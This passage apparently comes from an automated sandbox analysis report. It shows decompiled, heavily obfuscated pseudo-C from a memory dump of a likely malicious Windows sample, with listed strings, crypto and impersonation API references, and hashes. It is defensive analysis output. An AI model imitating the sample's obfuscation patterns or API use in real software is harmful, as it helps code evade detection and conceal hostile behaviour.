                                                          				signed char _t347;
                                                          				intOrPtr _t355;
                                                          				signed short _t356;
                                                          				signed char _t357;
                                                          				short _t365;
                                                          				intOrPtr _t374;
                                                          				void* _t375;
                                                          				void* _t379;
                                                          				void* _t380;
                                                          				void* _t381;
                                                          				void* _t383;
                                                          				void* _t384;
                                                          				void* _t386;
                                                          				void* _t390;
                                                          				signed int _t391;
                                                          				void* _t398;
                                                          				void* _t406;
                                                          				void* _t409;
                                                          				void* _t421;
                                                          				signed int _t423;
                                                          				void* _t424;
                                                          				void* _t425;
                                                          				void* _t427;
                                                          				void* _t428;
                                                          				void* _t429;
                                                          				void* _t431;
                                                          				void* _t436;
                                                          				void* _t437;
                                                          				void* _t439;
                                                          
                                                          				if(0xde != 0) {
                                                          					L3:
                                                          					_t342 =  *0x5081ba; // 0x510c
                                                          					L4:
                                                          					_t343 = _t342 - 0x9497;
                                                          					 *0x508206 =  *0x508206 + _t343;
                                                          					_pop(_t77);
                                                          					_pop(_t379);
                                                          					_pop(_t417);
                                                          					_t78 = _t77 +  *((intOrPtr*)(_t439 + 8));
                                                          					 *0x5081f4 = _t343 + _t343;
                                                          					_t345 =  *0x50822c; // 0x9f6d
                                                          					 *0x50afe3 = _t78;
                                                          					if(_t379 >= 0) {
                                                          						 *0x50acfc =  *0x50acfc + _t379;
                                                          					}
                                                          					_pop(_t419);
                                                          					 *(_t439 - 0x1c) = _t78;
                                                          					_t313 = 0x64b6;
                                                          					 *0x50afe5 = _t78;
                                                          					if(_t379 >= 0) {
                                                          						 *0x50aed0 =  *0x50aed0 + _t379;
                                                          						 *0x50afd8 = _t78;
                                                          						 *0x50807e =  *0x50807e + _t78;
                                                          					}
                                                          					 *0x508136 = _t313;
                                                          					_push(_t379);
                                                          					 *(_t439 - 0xc) = _t78;
                                                          					if(0xe0 < 0xe0) {
                                                          						_t313 = 0x84aa;
                                                          					}
                                                          					_pop(_t380);
                                                          					if((_t345 & 0x000000a7) < 0) {
                                                          					}
                                                          					_t381 = _t380;
                                                          					_t383 = _t381;
                                                          					_pop(_t421);
                                                          					_t314 =  *(_t439 - 8);
                                                          					_t85 =  *(_t439 - 0x84);
                                                          					 *0x50843b =  *0x50843b + _t383;
                                                          					E0050814C = _t314;
                                                          					_t347 = _t314;
                                                          					if(_t314 <= _t314) {
                                                          						 *0x509823 =  *0x509823 + _t347;
                                                          					}
                                                          					 *0x50afe3 = _t85;
                                                          					 *0x50afe6 = _t85;
                                                          					 *(_t439 - 8) = _t314;
                                                          					_t317 =  *(_t439 - 8);
                                                          					_t384 = _t383;
                                                          					_t423 = _t421;
                                                          					_t86 =  *(_t85 + 0x1c);
                                                          					 *0x50afe3 = _t86;
                                                          					_push(_t384);
                                                          					 *(_t439 - 8) = _t317;
                                                          					_t318 = _t317 - 0x79;
                                                          					_push(_t423);
                                                          					if((_t423 & 0x00a3b631) < 0) {
                                                          						L16:
                                                          						_t347 =  *0x5081c4; // 0x3542
                                                          						 *0x508210 = _t347;
                                                          						goto L17;
                                                          					} else {
                                                          						E00508174 = 0x755f;
                                                          						if(_t318 - 0x68bc > _t318 - 0x68bc) {
                                                          							L17:
                                                          							 *0x50833f =  *0x50833f - _t423;
                                                          							 *0x508daf =  *0x508daf + _t423;
                                                          							_pop(_t424);
                                                          							_pop(_t386);
                                                          							_t322 =  *(_t439 - 8);
                                                          							 *((intOrPtr*)(_t439 - 0x20)) = _t86 +  *((intOrPtr*)(_t439 + 8));
                                                          							_t88 =  *(_t439 - 0x84);
                                                          							 *(_t439 - 8) = _t322;
                                                          							if(_t322 <= _t322) {
                                                          								if(_t322 < _t322) {
                                                          								}
                                                          								 *0x5081e0 = _t347;
                                                          								_t347 =  *0x508210; // 0x19f4
                                                          							}
                                                          							 *0x50afe3 = _t88;
                                                          							_t323 =  *(_t439 - 8);
                                                          							_t89 =  *((intOrPtr*)(_t88 + 0x14));
                                                          							 *0x50853f =  *0x50853f + _t89;
                                                          							_t90 = _t89 + 1;
                                                          							if((_t90 & 0x000000b5) == 0) {
                                                          								 *0x50afe3 = _t90;
                                                          							}
                                                          							_push(_t386);
                                                          							if(_t386 < 0) {
                                                          								L27:
                                                          								if((_t347 & 0x0000009e) == 0) {
                                                          									goto L29;
                                                          								}
                                                          								goto L28;
                                                          							} else {
                                                          								if(_t90 >= 0xc50b4) {
                                                          									L26:
                                                          									 *0x5081b8 = 0x7c1d;
                                                          									_t347 = 0xf83a;
                                                          									goto L27;
                                                          								}
                                                          								 *0x50afd9 =  *0x50afd9 + _t90;
                                                          								if(0x1e65 < 0x2e) {
                                                          									L28:
                                                          									if((_t347 & 0x0099bde0) <= 0) {
                                                          										L30:
                                                          										_pop(_t390);
                                                          										_t91 = _t90 + _t90;
                                                          										if(_t390 != 0) {
                                                          											 *0x50818c = _t323;
                                                          											_t374 =  *0x5081c2; // 0x8a5b
                                                          											_t375 = _t374 - 0x99;
                                                          											 *0x50820c =  *0x50820c - _t375;
                                                          											_t347 = _t375 + _t375;
                                                          											 *0x50afe3 = _t91;
                                                          										}
                                                          										 *0x508b0f =  *0x508b0f + (0xf2 >> _t323) - _t91 + 0x1b;
                                                          										_t391 = _t390;
                                                          										 *(_t439 - 0x7c) = _t91;
                                                          										_push(_t424);
                                                          										 *0x50afe3 = _t91;
                                                          										_push(_t391);
                                                          										 *(_t439 - 8) = _t323;
                                                          										_t425 = _t424 + 0xc385;
                                                          										_t92 = _t91;
                                                          										_t393 = (_t391 & 0x000000df) - 0xd2b725;
                                                          										_t171 = 0xff;
                                                          										if((_t391 & 0x000000df) - 0xd2b725 == 0x757) {
                                                          											 *0x50afda =  *0x50afda - 0x22de8c;
                                                          											_t171 = 0x4d4c1a;
                                                          											_t323 = _t323 + _t323 - 0x7d9b;
                                                          											 *0x5081ec = _t347;
                                                          											if((_t347 & 0x000000a8) != 0) {
                                                          												 *0x50afe3 = _t92;
                                                          											}
                                                          										}
                                                          										 *0x50a64e =  *0x50a64e + _t425;
                                                          										_t93 = _t92;
                                                          										E004AE02F(_t93, _t171 - 0xe1, _t323, _t347, _t393, _t425, 1);
                                                          										_t427 = _t93;
                                                          										_t324 =  *(_t439 - 8);
                                                          										_t98 =  *(_t439 - 0x84);
                                                          										 *0x508178 = _t324;
                                                          										_push(0);
                                                          										 *0x50840f = _t98;
                                                          										 *(_t439 - 8) = _t324;
                                                          										 *0x5081ce = _t347;
                                                          										_pop(_t398);
                                                          										_t428 = _t427;
                                                          										_t329 =  *(_t439 - 8);
                                                          										 *(_t439 - 0x78) =  *((intOrPtr*)(_t98 + 0x14)) + 1 << 2;
                                                          										 *0x508160 =  *0x508160 - _t329;
                                                          										_push(_t428);
                                                          										_t429 = _t398;
                                                          										 *0x508ee3 = 0xc3;
                                                          										 *(_t439 - 8) = _t329;
                                                          										 *0x50819a = _t329 - 0x596901;
                                                          										_push(0xcfbfa9);
                                                          										_push( *(_t439 - 0x84));
                                                          										_t331 =  *(_t439 - 8);
                                                          										E0050814C = _t331;
                                                          										_pop(_t103);
                                                          										_pop(_t404);
                                                          										_t431 = _t429;
                                                          										_t104 =  *((intOrPtr*)(_t103 + 0x18));
                                                          										_push(_t431);
                                                          										if(_t104 < 0) {
                                                          											_t273 =  *0x508873; // 0x50008e
                                                          											if(_t273 - 0x2f6d >> _t331 >= _t331) {
                                                          												 *0x508156 = _t331;
                                                          											}
                                                          										}
                                                          										 *0x508d5f = _t104 + 1;
                                                          										if(_t331 < _t331) {
                                                          											L42:
                                                          											goto L43;
                                                          										} else {
                                                          											if(0x92 >= 0) {
                                                          												L43:
                                                          												_t105 = _t104 + 1;
                                                          												 *0x50afe1 = _t105;
                                                          												_push(0);
                                                          												 *0x50afe6 = _t105;
                                                          												 *(_t439 - 8) = _t331;
                                                          												 *0x50817a = _t331;
                                                          												_t355 =  *0x5081cc; // 0x48e8
                                                          												_t356 = _t355 - 0x9238;
                                                          												_push(_t105);
                                                          												if(_t331 < _t331) {
                                                          													_t356 = _t356 - 0x928c0b;
                                                          													 *0x50afe1 = 0x2167e7;
                                                          												}
                                                          												_pop(_t107);
                                                          												 *0x50afe5 = _t107;
                                                          												 *0x50afe6 = _t107;
                                                          												_t108 = _t107;
                                                          												_pop(_t406);
                                                          												_pop(_t436);
                                                          												_t332 =  *(_t439 - 8);
                                                          												 *(_t439 - 0x2c) = _t108;
                                                          												 *(_t439 - 8) = _t332;
                                                          												if((_t332 & 0x00008389) == 0) {
                                                          													_t356 = _t356 + 0x9241ba;
                                                          													 *0x508238 =  *0x508238;
                                                          													 *0x50afe5 = _t108;
                                                          												}
                                                          												 *0x508573 = _t108;
                                                          												 *0x50afe6 =  *0x50afe6 + _t108;
                                                          												_t333 =  *(_t439 - 8);
                                                          												_t409 = _t406;
                                                          												_t437 = _t436;
                                                          												 *(_t439 - 0x48) = _t108;
                                                          												if(_t437 > 0) {
                                                          													L52:
                                                          													goto L53;
                                                          												} else {
                                                          													 *0x50afd8 = _t108;
                                                          													if(0xf3 + _t108 + 0x1c >= 0x34) {
                                                          														L53:
                                                          														 *0x5087ff = _t108;
                                                          														 *0x5080f6 =  *0x5080f6 + 0x3ce377;
                                                          														_t357 = _t356 + 0x636d;
                                                          														_t110 = 8 *  *(_t439 - 0x2c);
                                                          														_push(_t357);
                                                          														if((_t357 & 0x000000a8) <= 0) {
                                                          															 *0x50afd8 = _t110;
                                                          															if(8 >= 0x163567) {
                                                          															}
                                                          														}
                                                          														 *0x50afdf =  *0x50afdf + 0x7f42;
                                                          														 *0x50825c =  *0x50825c - _t437;
                                                          														_t212 = _t110;
                                                          														_pop(_t365);
                                                          														 *(_t439 - 0x74) = _t110;
                                                          														if(_t110 == 3) {
                                                          															L64:
                                                          															 *0x50afdc =  *0x50afdc - _t212;
                                                          															goto L65;
                                                          														} else {
                                                          															_t234 =  *0x5087bf; // 0x0
                                                          															 *0x50808a =  *0x50808a - _t110;
                                                          															 *0x508b33 =  *0x508b33 + _t234;
                                                          															_t235 = _t234 + _t234;
                                                          															if(_t235 == _t235) {
                                                          																if(_t235 <= _t235) {
                                                          																	 *0x508142 = _t333;
                                                          																}
                                                          																_t235 = 0x8159;
                                                          															}
                                                          															 *0x5081c8 =  *0x5081c8 - _t365;
                                                          															 *0x50afe3 = _t110;
                                                          															 *0x50afe6 = _t110;
                                                          															 *0x50afe6 = _t110;
                                                          															if("charmap.exe" + _t110 <= 0x2c) {
                                                          																L65:
                                                          																 *0x50817a =  *0x50817a - _t333;
                                                          																 *0x508198 =  *0x508198 - _t333;
                                                          																 *0x50afe0 =  *0x50afe0 - _t365;
                                                          																_push( *(_t439 - 0x74));
                                                          																_t221 = 0xe6;
                                                          																_push(_t409);
                                                          																if(_t110 < 0) {
                                                          																	 *0x508837 =  *0x508837 + _t110;
                                                          																	_t232 =  *0x508ba7; // 0x0
                                                          																	_t221 = _t232 - 0x46;
                                                          																	 *0x5080fc =  *0x5080fc + 0x9a0c;
                                                          																	 *(_t439 - 8) =  *(_t439 - 8) + _t333;
                                                          																	if(_t333 > _t333) {
                                                          																		 *0x5081b8 = _t365;
                                                          																	}
                                                          																	 *0x50afe1 = _t110;
                                                          																}
                                                          																_t222 = _t221 + 0xcf;
                                                          																 *0x50afe5 =  *0x50afe5 - _t110;
                                                          																if(_t110 == 0) {
                                                          																	L72:
                                                          																	 *0x5080b2 =  *0x5080b2 - _t222;
                                                          																	goto L73;
                                                          																} else {
                                                          																	_t222 = 7;
                                                          																	if(_t110 != 0xdb01d) {
                                                          																		L73:
                                                          																		_push(E004F2981);
                                                          																		_push(E004A80E0);
                                                          																		return _t110;
                                                          																	}
                                                          																	_t222 = _t110 - 0x2ecc;
                                                          																	goto L72;
                                                          																}
                                                          															} else {
                                                          																_t212 = 0x354e0d;
                                                          																goto L64;
                                                          															}
                                                          														}
                                                          													}
                                                          													 *0x508144 = _t333;
                                                          													_t356 = _t356 - _t333 - _t333 - 0x84;
                                                          													 *0x5081e2 = _t356;
                                                          													if((_t356 & 0x0000a175) > 0) {
                                                          														 *0x50afe3 = _t108;
                                                          													}
                                                          													 *0x5086e3 =  *0x5086e3 - _t409;
                                                          													goto L52;
                                                          												}
                                                          											}
                                                          											 *0x50afe0 =  *0x50afe0 - 0x50afdf;
                                                          											goto L42;
                                                          										}
                                                          									}
                                                          									L29:
                                                          									 *0x5086b7 =  *0x5086b7 - _t386 + _t424;
                                                          									goto L30;
                                                          								}
                                                          								goto L26;
                                                          							}
                                                          						}
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          				 *0x50871f =  *0x50871f - 6;
                                                          				 *0x50afda =  *0x50afda + __ebx;
                                                          				if(__ebx < __ebx) {
                                                          					goto L4;
                                                          				}
                                                          				 *0x5093b7 =  *0x5093b7 + 0x6548;
                                                          				goto L3;
                                                          			}

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: N5$8j $B5d$BuildExplicitAccessWithNameA$CIRCoInst.dll$GetTickCount64$RemoveVectoredExceptionHandler$System.Web.DynamicData.dll$V3)$WSearchMigPlugin.dll$api-ms-win-core-sysinfo-l1-1-0.dll$charmap.exe$w<$g!
                                                          • API String ID: 0-1212518677
                                                          • Opcode ID: c48cd4197a1a0f4530921f3ac402bf0c062bc21344f27cdd953558e696aa0ea7
                                                          • Instruction ID: 0565d62878e55a0176d10ffbb799ec1cf8019df23d2908ab38e3cff0af045cf2
                                                          • Opcode Fuzzy Hash: c48cd4197a1a0f4530921f3ac402bf0c062bc21344f27cdd953558e696aa0ea7
                                                          • Instruction Fuzzy Hash: 9A22E3BAB043468FC700DF79ED94AED3BB1EB7A320B08416AC98497763DA790409E755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 55%
                                                          			E004D13C5(void* __ebx, signed int __edx, short __esi) {
                                                          				signed int _t75;
                                                          				signed int _t76;
                                                          				signed int _t77;
                                                          				signed int _t80;
                                                          				unsigned char _t83;
                                                          				signed int _t90;
                                                          				signed int _t92;
                                                          				signed int _t94;
                                                          				signed int _t98;
                                                          				short _t101;
                                                          				signed int _t112;
                                                          				signed int _t117;
                                                          				void* _t144;
                                                          				char* _t151;
                                                          				unsigned short _t157;
                                                          				signed int _t164;
                                                          				short _t184;
                                                          				signed char _t185;
                                                          				signed int _t190;
                                                          				signed char _t191;
                                                          				intOrPtr _t197;
                                                          				signed int _t198;
                                                          				short _t205;
                                                          				void* _t209;
                                                          
                                                          				_t205 = __esi;
                                                          				_t198 = __edx;
                                                          				_t184 = 0x63d7;
                                                          				_t75 =  *(_t209 - 8);
                                                          				 *(_t209 - 8) = _t75;
                                                          				if(_t75 < 0x1bc6b7) {
                                                          					L3:
                                                          					_t198 = _t198 - 0x9d1f;
                                                          					 *0x50823c = _t205;
                                                          					goto L4;
                                                          				} else {
                                                          					_t197 =  *0x508136; // 0x4aea
                                                          					_t184 = _t197 - 0x65ee;
                                                          					if(_t184 > _t184) {
                                                          						_t184 = _t184 + _t184;
                                                          						if((__edx & 0x00008577) != 0) {
                                                          							goto L3;
                                                          						}
                                                          						L4:
                                                          						_t76 =  *0x50afe3; // -68
                                                          						 *0x50afe5 = _t76;
                                                          					}
                                                          				}
                                                          				_t77 =  *(_t209 - 8);
                                                          				 *(_t209 - 0x44) = _t77;
                                                          				 *(_t209 - 8) = _t77;
                                                          				_t80 =  *(_t209 - 8);
                                                          				if(_t184 <= _t184) {
                                                          					_t184 = _t184 - 0x5d4ac9 + 0x6b6f4e;
                                                          					 *0x5081a8 = _t198;
                                                          					_t198 =  *0x5081f4; // 0xcb00
                                                          					 *0x50afe0 =  *0x50afe0 - _t198;
                                                          					 *0x508242 =  *0x508242 + _t205;
                                                          					if(_t205 != 0) {
                                                          						 *0x50afe5 =  *0x50afe5 - _t80;
                                                          					}
                                                          				}
                                                          				 *(_t209 - 8) = _t80;
                                                          				 *0x50afdc =  *0x50afdc - 2;
                                                          				 *0x508176 = _t184;
                                                          				 *(_t209 - 0x40) = _t80;
                                                          				 *(_t209 - 8) = _t80;
                                                          				L0046426A(_t184, _t205, _t80, _t80);
                                                          				_t83 =  *(_t209 - 8);
                                                          				_t185 = _t184 + 0x6b27;
                                                          				 *0x50817e = _t185;
                                                          				if(_t185 != _t185) {
                                                          					_t198 = 0x9293;
                                                          					 *0x50821a = 0x9293;
                                                          					_t205 = _t205 - 0xa6d0fd;
                                                          				}
                                                          				 *0x50afe3 =  *0x50afe3 + _t83;
                                                          				E0050869B = E0050869B + 0xd3a171;
                                                          				 *(_t209 - 8) = _t83;
                                                          				 *(_t209 - 8) = _t209 - 0x64;
                                                          				E004C5BEC(_t209 - 0xffffffffffffe0f3, _t198);
                                                          				_t90 =  *(_t209 - 8);
                                                          				 *(_t209 - 8) = _t90;
                                                          				 *(_t209 - 0xc) =  !_t90;
                                                          				_t92 =  *(_t209 - 8);
                                                          				_t144 = (_t83 >> _t185) - 0x3824;
                                                          				 *(_t209 - 0x14) =  *(_t209 - 0x14) + _t144;
                                                          				 *0x508108 =  *0x508108 - _t144;
                                                          				 *(_t209 - 0x88) = _t92;
                                                          				 *(_t209 - 8) = _t92;
                                                          				_t94 =  *(_t209 - 8);
                                                          				if((_t144 - _t185 >> _t185) + (_t144 - _t185 >> _t185) <= (_t144 - _t185 >> _t185) + (_t144 - _t185 >> _t185)) {
                                                          				}
                                                          				 *((intOrPtr*)(_t209 - 0x18)) =  *((intOrPtr*)(_t209 - 0x18)) + _t185;
                                                          				 *(_t209 - 8) = _t94;
                                                          				if(_t94 == 0x1c) {
                                                          				}
                                                          				_push( *(_t209 - 0x88));
                                                          				_t98 =  *(_t209 - 8);
                                                          				_t151 = "WcnEapAuthProxy.dll";
                                                          				_t190 = E0050814C; // 0x4487
                                                          				 *(_t209 - 8) = _t98;
                                                          				if(_t98 - 0x1edf < 0x2ea4) {
                                                          					 *0x5080b2 =  *0x5080b2 + _t151;
                                                          					 *(_t209 - 0x10) = _t151;
                                                          					if(_t151 < _t151) {
                                                          						_t190 = 0x5df2;
                                                          					}
                                                          					 *((intOrPtr*)(_t209 - 0x1c)) =  *((intOrPtr*)(_t209 - 0x1c)) + _t190;
                                                          					_t190 =  *0x5081a2; // 0xea53
                                                          				}
                                                          				 *0x5081ec = _t198;
                                                          				_t101 = RegisterClassW(??);
                                                          				 *0x5086bf =  *0x5086bf + 0xd3a171;
                                                          				 *(_t209 - 8) = _t101;
                                                          				_push(_t101);
                                                          				E00465A23();
                                                          				_t191 = _t190 - 0x61;
                                                          				_t157 =  *(_t209 - 0x14) >> _t191;
                                                          				 *0x50afda =  *0x50afda - _t157;
                                                          				 *(_t209 - 0x10) = _t157;
                                                          				 *0x508150 = _t191;
                                                          				_t164 =  *(_t209 - 0xc);
                                                          				_t112 =  *(_t209 - 8);
                                                          				if(_t112 != 0) {
                                                          					 *(_t209 - 8) = _t112;
                                                          					_t112 =  *(_t209 - 8);
                                                          					if(_t164 - 0x34fccf >= 0x3c20) {
                                                          						L23:
                                                          						 *0x50afe3 = _t112;
                                                          						 *0x50afe3 = _t112;
                                                          						L24:
                                                          						_push(0);
                                                          						 *0x50858f = _t112;
                                                          						_push(0);
                                                          						_push(E004D174A);
                                                          						goto ( *0x509aa7);
                                                          					}
                                                          					 *0x50afdd =  *0x50afdd + 0x6e30;
                                                          					if(0x6e30 < 0x6e30) {
                                                          						goto L24;
                                                          					}
                                                          					 *0x5081e6 = 0x8af8;
                                                          					 *0x508200 = 0x8af8;
                                                          					goto L23;
                                                          				}
                                                          				 *(_t209 - 8) = _t112;
                                                          				_push(0);
                                                          				 *0x50afda =  *0x50afda -  *(_t209 - 0x10) - 0x3f5e58;
                                                          				_t117 =  *(_t209 - 8);
                                                          				_push(0);
                                                          				 *(_t209 - 0xc) =  *(_t209 - 0xc) + _t117;
                                                          				 *(_t209 - 8) = _t117;
                                                          				_push(0x4d1fe4);
                                                          				_push(E004A9734);
                                                          				return _t117;
                                                          			}




























                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ClassRegister
                                                          • String ID: GetTickCount64$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$RtlEthernetStringToAddressW$SystemPropertiesComputerName.exe$WcnEapAuthProxy.dll$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$wlanmsm.dll
                                                          • API String ID: 2764894006-3848357215
                                                          • Opcode ID: 866197fcd30528828884ecc7270bb0eab287513432df7589e58831ba26d82368
                                                          • Instruction ID: 467c1dacd751d70e67d16d29540b7ae9e91a120f4050c6407bdb3b68b2001e7a
                                                          • Opcode Fuzzy Hash: 866197fcd30528828884ecc7270bb0eab287513432df7589e58831ba26d82368
                                                          • Instruction Fuzzy Hash: 92A14E79E0034A9FCB00DFB8E894AED7FB0EB39310F54506AD885E7312E6745A89DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0048CD75
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: 1U/$BuildExplicitAccessWithNameA$EtwEventWriteStartScenario$GetTickCount64$WcnEapAuthProxy.dll$credssp.dll$ddrawex.dll$Nqt
                                                          • API String ID: 190572456-1961191525
                                                          • Opcode ID: 91ab8bbda68f93afdb91d5c51ccf4d98d2a1ded26ea25c0518b420c49c524dd8
                                                          • Instruction ID: c6f00d62763067a06119da5f3fd9feb3e559fe26031c5dc67f6093944690e7b3
                                                          • Opcode Fuzzy Hash: 91ab8bbda68f93afdb91d5c51ccf4d98d2a1ded26ea25c0518b420c49c524dd8
                                                          • Instruction Fuzzy Hash: 2D619C78A043068FCB00EFB8E8D5AED7BF1EB38310F44447A9988D7362D6780949E755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CryptExport
                                                          • String ID: BuildExplicitAccessWithNameA$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$SystemPropertiesComputerName.exe$WindowsCodecs.dll$api-ms-win-core-sysinfo-l1-1-0.dll$nshhttp.dll$u:$wmi.dll
                                                          • API String ID: 3389274496-620182036
                                                          • Opcode ID: f128c7c5d5c34129a15e738a7608bbd595044b0df69b8fa855b23812b14aa214
                                                          • Instruction ID: 42d01b82975dca2bd079c0415e2d83a74664df16ae86bde1ee3f8d05dc6f71df
                                                          • Opcode Fuzzy Hash: f128c7c5d5c34129a15e738a7608bbd595044b0df69b8fa855b23812b14aa214
                                                          • Instruction Fuzzy Hash: E44116B5E0030AAFDB00DFA8C8C5AEDBFF0FB29310F50457AA945EB742D2745A858B55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CryptDecrypt.ADVAPI32(?), ref: 004B4342
                                                          • CryptDestroyKey.ADVAPI32(?), ref: 004B4547
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Crypt$DecryptDestroy
                                                          • String ID: GetAccessPermissionsForObjectW$RtlImpersonateSelfEx$SystemPropertiesComputerName.exe$ZwLoadKeyEx$_,$api-ms-win-core-rtlsupport-l1-1-0.dll
                                                          • API String ID: 2348474682-1156052112
                                                          • Opcode ID: b1fd4ea236b166e8ea25bc6e1e5eb4adbe73cfbe5da1905c922dffa495b9fd11
                                                          • Instruction ID: 094b9032548fd2773f703aead1438b52eebf400d5412c4c0762a7ce50be06148
                                                          • Opcode Fuzzy Hash: b1fd4ea236b166e8ea25bc6e1e5eb4adbe73cfbe5da1905c922dffa495b9fd11
                                                          • Instruction Fuzzy Hash: 3C61FFB8A003469FCB00DFB9E898ADD7FF1FB78310F1441AAD884D7752D239494A9715
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E0049868A() {
                                                          				signed char _t60;
                                                          				signed char _t62;
                                                          				signed char _t64;
                                                          				signed char _t65;
                                                          				signed char _t66;
                                                          				signed char _t75;
                                                          				signed char _t76;
                                                          				signed char _t83;
                                                          				signed char _t85;
                                                          				signed char _t95;
                                                          				unsigned short _t105;
                                                          				void* _t106;
                                                          				unsigned short _t107;
                                                          				unsigned short _t120;
                                                          				void* _t122;
                                                          				void* _t129;
                                                          				signed int _t176;
                                                          				unsigned short _t178;
                                                          				short _t189;
                                                          				void* _t192;
                                                          				void* _t197;
                                                          				intOrPtr _t199;
                                                          				signed char _t200;
                                                          				intOrPtr _t207;
                                                          				intOrPtr _t208;
                                                          				short _t211;
                                                          				signed int _t214;
                                                          				signed int _t215;
                                                          				unsigned short _t221;
                                                          				void* _t224;
                                                          
                                                          				_t105 = 0x3385d0;
                                                          				_t60 =  *(_t224 - 8);
                                                          				if(0x3385d0 <= 0x3385d0) {
                                                          					_t105 =  *(_t224 - 0x10);
                                                          					_t176 = 0xfffffffffffff03b;
                                                          				}
                                                          				 *0x508192 =  *0x508192 + _t176;
                                                          				_t199 = _t197 + _t197 + _t197 + _t197;
                                                          				_push( *0x508214);
                                                          				_t215 =  !_t214;
                                                          				 *0x50afe6 = _t60;
                                                          				if(_t215 >= 0) {
                                                          					 *(_t224 - 8) = _t60;
                                                          					_t105 = 0;
                                                          					_t176 = _t176 - 0x62f4 - _t199;
                                                          					_t199 =  *0x5081e4; // 0x5a9a
                                                          					 *0x50afe1 = _t60;
                                                          				}
                                                          				_t221 = 0xb4ae37;
                                                          				 *(_t224 - 8) = _t60;
                                                          				_t106 = _t105 - 0x2cd0;
                                                          				_t62 =  *(_t224 - 8);
                                                          				if(_t106 < 0x3c94) {
                                                          					_t106 = _t106 + _t106;
                                                          					if(_t106 >= _t176 || _t176 > _t176) {
                                                          						 *0x508166 = _t176;
                                                          					}
                                                          					_t176 =  *0x50819a; // 0x6b8d
                                                          					_t199 = 0x8b6d;
                                                          				}
                                                          				 *0x508200 = _t199;
                                                          				_t200 = _t199 + _t199;
                                                          				_t107 = _t106 + 0xb6;
                                                          				 *0x50afe3 = _t62;
                                                          				_push( *0x5080d8);
                                                          				 *(_t224 - 8) = _t62;
                                                          				_t64 = E00464241(_t200, _t107, 0, 0);
                                                          				if(_t107 == _t107) {
                                                          					_t107 =  *(_t224 - 0x10);
                                                          					_t192 = _t176 - 0x6617;
                                                          					 *0x50816e =  *0x50816e - _t192;
                                                          					_t176 = _t192 + _t192;
                                                          					_t200 =  *0x5081bc; // 0x381a
                                                          					if((_t200 & 0x00000090) >= 0) {
                                                          						 *0x508208 = _t200;
                                                          					}
                                                          					 *0x50afe3 = 0xc0;
                                                          					_t221 = _t221 - _t215;
                                                          					_t215 = _t215 + 0xd3c6dd;
                                                          					_t64 = 0x1cdc02;
                                                          				}
                                                          				 *0x508ad7 = _t107;
                                                          				 *0x50813c = _t176;
                                                          				_t178 = (_t176 ^ 0x005c8056) - 0x79;
                                                          				 *0x5081d8 = _t200;
                                                          				_t202 = 0xa636;
                                                          				 *0x50afe1 = _t64;
                                                          				_t65 =  *(_t224 - 8);
                                                          				_push( *0x508044);
                                                          				if((_t65 & _t65) == 0) {
                                                          					_t178 = _t178 - 0x7b;
                                                          					 *0x5081e0 =  *0x5081e0 + 0xa636;
                                                          					_t202 = 0x50afe1;
                                                          					_t221 = _t221 + 1 >> _t178;
                                                          				}
                                                          				 *(_t224 - 8) = _t65;
                                                          				if(_t65 != 0x23) {
                                                          					L18:
                                                          					_t178 = _t178 - 0x6a45;
                                                          					goto L19;
                                                          				} else {
                                                          					if("psxdllsvr.dll" < "psxdllsvr.dll") {
                                                          						L19:
                                                          						 *0x5081ae = _t202;
                                                          						_t66 =  *(_t224 - 8);
                                                          						_push( *0x5081ee);
                                                          						 *0x50afe6 =  *0x50afe6 + _t66;
                                                          						 *0x50afe6 = _t66;
                                                          						 *(_t224 - 8) = _t66;
                                                          						 *0x508188 = (_t178 >> _t178) - 1;
                                                          						_t181 = 0;
                                                          						_t205 =  &(_t202[0x91b1]) - 0xffffffffff88a9a9;
                                                          						 *0x508206 =  &(_t202[0x91b1]) - 0xffffffffff88a9a9;
                                                          						if(("RtlImpersonateSelfEx" & 0x0000004f) + 0x4ce8ca < 0x38) {
                                                          							 *(_t224 - 0x10) =  *(_t224 - 0x10);
                                                          							 *0x508138 = 0;
                                                          							_t181 = 0;
                                                          						}
                                                          						 *0x50afdf =  *0x50afdf - _t181;
                                                          						E00464241(_t205, _t205, _t205, _t205);
                                                          						_t207 =  *0x50820a; // 0x8e68
                                                          						_t120 =  *0x508ae7;
                                                          						_t75 =  *(_t224 - 8);
                                                          						_push( *0x508050);
